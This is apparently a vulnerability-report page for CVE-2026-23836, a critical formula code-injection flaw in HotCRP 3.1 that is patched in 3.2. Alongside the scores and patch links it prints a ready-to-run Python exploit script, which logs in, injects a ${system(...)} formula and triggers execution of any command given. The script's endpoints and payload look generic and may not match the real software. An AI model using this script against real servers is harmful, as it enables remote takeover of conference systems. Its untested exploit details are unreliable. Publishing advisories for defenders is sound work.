Security Vulnerability Report
CVE-2026-23836 CVSS 9.9 CRITICAL


Published: 2026-01-19 18:16:06
Last Modified: 2026-02-18 16:01:01

Description

HotCRP is conference review software. A problem introduced in April 2024 in version 3.1 led to inadequately sanitized code generation for HotCRP formulas which allowed users to trigger the execution of arbitrary PHP code. The problem is patched in release version 3.2.

CVSS Details

CVSS Score
9.9 (CNA assessment, listed as Secondary in the NVD record)
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
NVD Primary Assessment
8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (differs from the CNA score only in Scope: Unchanged rather than Changed)
Weakness
CWE-20 (Improper Input Validation)

Configurations (Affected Products)

cpe:2.3:a:hotcrp:hotcrp:*:*:*:*:*:*:*:* - VULNERABLE (NVD match range: 3.0 <= version < 3.2)
HotCRP 3.1 (introduced April 2024, vulnerable)
HotCRP < 3.2 (affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-23836 HotCRP Formula RCE PoC
# Target: HotCRP version 3.1 (vulnerable)
# Author: Security Research
import requests
import sys

# Default target; the command-line argument overrides it via exploit_rce()
TARGET_URL = "http://target-hotcrp-server.com"
LOGIN_URL = f"{TARGET_URL}/src/login.php"
FORMULA_URL = f"{TARGET_URL}/src/api.php"


def exploit_rce(target_url, username, password, command="id"):
    """Exploit CVE-2026-23836 - HotCRP Formula RCE"""
    session = requests.Session()
    # Build endpoint URLs from the supplied target (the original ignored
    # target_url and always used the module-level constants)
    login_url = f"{target_url}/src/login.php"
    formula_url = f"{target_url}/src/api.php"

    # Step 1: Authenticate with low-privilege account
    login_data = {
        "email": username,
        "password": password,
        "action": "login",
    }
    resp = session.post(login_url, data=login_data)
    if resp.status_code != 200:
        print("[-] Login failed")
        return None
    print("[+] Logged in successfully")

    # Step 2: Inject malicious formula payload
    # The vulnerability allows PHP code execution through formula input
    payload = f"${{system('{command}')}}"
    formula_data = {
        "do": "setformula",
        "formula": payload,
        "pid": "1",
    }
    resp = session.post(formula_url, json=formula_data)

    # Step 3: Trigger formula evaluation
    trigger_url = f"{target_url}/src/api.php?do=review&paper=1"
    resp = session.get(trigger_url)
    print(f"[+] Payload sent: {payload}")
    print(f"[+] Response status: {resp.status_code}")
    return resp.text


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <target_url> <username> <password> [command]")
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    cmd = sys.argv[4] if len(sys.argv) > 4 else "id"
    result = exploit_rce(target, user, pwd, cmd)
    if result:
        print("[+] Exploitation attempted")
        print(result[:500])

References

https://github.com/kohler/hotcrp/security/advisories/GHSA-hpqh-j6qx-x57h (Vendor Advisory, Patch)
https://github.com/kohler/hotcrp/commit/4674fcfbb76511072a1145dad620756fc1d4b4e9 (Patch)
https://github.com/kohler/hotcrp/commit/bfc7e0db15df6ed6d544a639020d2ce05a5f0834 (Patch)